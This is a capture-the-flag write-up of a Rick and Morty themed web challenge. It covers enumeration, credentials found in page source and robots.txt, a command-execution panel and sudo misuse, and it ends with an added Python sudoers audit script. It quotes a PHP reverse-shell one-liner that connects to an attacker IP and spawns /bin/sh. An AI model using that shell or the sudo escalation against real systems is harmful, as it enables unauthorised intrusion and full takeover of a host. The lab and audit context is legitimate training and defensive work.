Hello, and thank you for taking the time to read this report. This will be my 4th write-up.
“This Rick and Morty themed challenge requires you to exploit a webserver in order to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.”
I started with a basic nmap scan to make sure there weren't any other web services being hosted on a different port. There weren't, so I headed right into the site!
Here we see a message from Rick! We’ve been given our task! From here, I run GoBuster so I can draw out any interesting subdirectories with specific extensions. This can provide us with a variety of methods, including the discovery of some sort of vector, to gain access.
During the scan, I see we already have a few interesting options to visit. We have a login page!
From here, we have to acquire a user and password list to potentially brute force against. Let's do some more investigating.
I decided to navigate back to the home page and had a look around with the inspector tools. Knowing Rick, I knew this is where he’d hide a clue for us. We’ve found our user. Let's try and look for any clues on passwords!
Here we see Rick’s famous quote on the robots.txt page! It actually translates to, “I am in great pain, please help me!” according to Birdperson. No worries Rick, we are one step closer to saving you.
Seems like his catchphrase worked as a password for us; we have logged in! Here we have the possibility of user input which can be interpreted as commands!
From here, I decide to attempt to spawn a reverse shell.
php -r '$sock=fsockopen("10.6.43.46",4444);exec("/bin/sh -i <&4 >&4 2>&4");'
Voila! A reverse shell has been spawned as “www-data!”
First ingredient found! I thought ahead and was sure of what I could run with sudo privileges; it seems we have no restraint on what we can ask for as this user. A simple “ls” command revealed the “.txt” document that held the first flag!
I didn't think the 2nd ingredient had to be accessed by root, but I still used “sudo -u” as root to run the “cat” command. Since the filename has spaces, I wrote it within quotations.
Again, I used “sudo -u” to run the following “ls” command as root. This allows me to display the contents of this directory. Then, I tried to use the “cat” command. I wasn't able to, so I used “head” instead, specified the path of the file, and finished with “sudo -u” to run everything as root. With this, we have successfully saved Rick and brought him back to his human form.
Thank you for reading!
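The step that turned a www-data shell into full control of the box was the unrestricted sudo grant described above. The following audit sketch is an added example, not part of the original write-up: it flags sudoers rules that give web or database service accounts unrestricted or passwordless sudo. The sudoers lines, the service-account list and the function name are all constructed for illustration, and aliases are not expanded.

```python
import re

# Assumption: illustrative list of service accounts that should not hold sudo rights.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

# Matches: user host=(runas) [TAG:] command[, command...]
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)

# Constructed sample, not taken from the challenge machine.
SAMPLE = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
nginx ALL=(root) /usr/sbin/nginx -s reload
mysql ALL=(root) NOPASSWD: /usr/bin/mysqldump
"""

def audit_sudoers(text):
    """Return (line number, account, issue) for risky service-account rules."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments, Defaults and alias definitions.
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line.split()[0]:
            continue
        m = RULE.match(line)
        if not m or m.group("who").lstrip("%") not in SERVICE_ACCOUNTS:
            continue
        rest = m.group("rest")
        nopasswd = "NOPASSWD:" in rest
        # Drop tags such as NOPASSWD: or SETENV: and split the command list.
        cmds = [c.strip() for c in re.sub(r"\b[A-Z_]+:\s*", "", rest).split(",")]
        runas = re.split(r"[:,]", m.group("runas") or "root")
        if not any(r.strip() in ("ALL", "root") for r in runas):
            continue
        if "ALL" in cmds:
            issue = "unrestricted, no password" if nopasswd else "unrestricted"
            findings.append((lineno, m.group("who"), issue))
        elif nopasswd:
            findings.append((lineno, m.group("who"), "passwordless command"))
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

A rule flagged as "passwordless command" still needs a manual check of whether the named binary can read arbitrary files or spawn a shell.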